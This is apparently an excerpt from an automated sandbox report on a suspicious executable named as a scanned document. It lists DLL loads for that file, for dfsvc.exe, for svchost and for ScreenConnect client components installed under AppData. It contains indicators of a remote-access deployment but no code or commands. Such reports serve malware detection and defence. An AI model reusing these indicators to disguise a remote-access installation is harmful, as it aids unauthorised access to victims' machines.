                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
